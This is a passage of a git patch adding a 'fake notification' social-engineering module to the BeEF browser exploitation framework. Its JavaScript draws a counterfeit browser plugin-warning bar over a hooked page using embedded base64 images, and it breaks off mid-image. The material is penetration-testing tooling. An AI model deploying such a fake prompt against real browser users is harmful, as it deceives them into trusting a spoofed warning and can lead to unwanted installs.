 .../fake_notification_c/module.rb             |  29 +++++++++++++++
 7 files changed, 79 insertions(+)
 create mode 100644 modules/social_engineering/fake_notification_c/command.js
 create mode 100644 modules/social_engineering/fake_notification_c/config.yaml
 create mode 100644 modules/social_engineering/fake_notification_c/img/filler.png
 create mode 100644 modules/social_engineering/fake_notification_c/img/plugins-left.png
 create mode 100644 modules/social_engineering/fake_notification_c/img/plugins-right.png
 create mode 100644 modules/social_engineering/fake_notification_c/img/plugins.png
 create mode 100644 modules/social_engineering/fake_notification_c/module.rb

diff --git a/modules/social_engineering/fake_notification_c/command.js b/modules/social_engineering/fake_notification_c/command.js
new file mode 100644
index 000000000..8fa313fbf
--- /dev/null
+++ b/modules/social_engineering/fake_notification_c/command.js
@@ -0,0 +1,35 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var id = beef.dom.generateID();
+	var pid = beef.dom.generateID();
+	var zztop = beef.dom.getHighestZindex()+1;
+	var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:0px 20px 0px 20px; z-index:'+zztop+'; border-bottom:1px solid black; background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACIAAAAbCAYAAAAZMl2nAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAHJSURBVEhLzVY7UgMxDF2ZUwEVVJTM0NBxGipOwjUYho6WBlJxAbqQSbLm6ef1GmegyWh35kX+SPKTLDum3ed9HviT3yRN+WhqNh1Vr+ZJPagPIIscpzHXJW2osEEWAK0/7ioiLYGKDGuZg8wrMxPIUQbzkKxPLIUJwnIC6GcyYoVzFTS73qxuxapEBde9ryQgJ3OqMks4WMgICZHJWXFFsOv6tWzSdnXjibVUojvblinlmtfKHQff6h4KwxQ7HNXt9v26IXJge+Zays5I1GR0q+ZfYtXWvlFDvqzCXLJFD+7N56o+ycYoTjogsfHi5K3TuirAfBpGDAgwDnCdccEzxgYyx4XHMJ1hD7v/YISSOIUU2Lq2EDKiDDIGGLx6actqdh5tfj7HxaqYIjGGzrQwnnTdRuwscpS+GhLCcgyZ2Tt2aDO8b/psU+HPFDX6blvW37xdyan3XYuSiXivQCVaYmtwAwqZWIlTUx0RPyoBUotVMhIrafN64X8ToRWr94j8ZcdKbI1fWLEylSvbr+4guZyM+N9ztJSMRN+qvD6tX85/PXm6j6wjD9L389kiiPRftEeOvud+MUTo6+lyEVc8PT6c6hsg+Gn0AyTR5t4bxkW5AAAAAElFTkSuQmCC); background-repeat: repeat-x; background-color: #f6d646; display:none;'});
+	var ell = beef.dom.createElement('div',{'style':'width: 29px; height: 100%; padding: 0; margin: 0; position: absolute; left: 0px; top: 0px; background-image: url(data:image/png;base64,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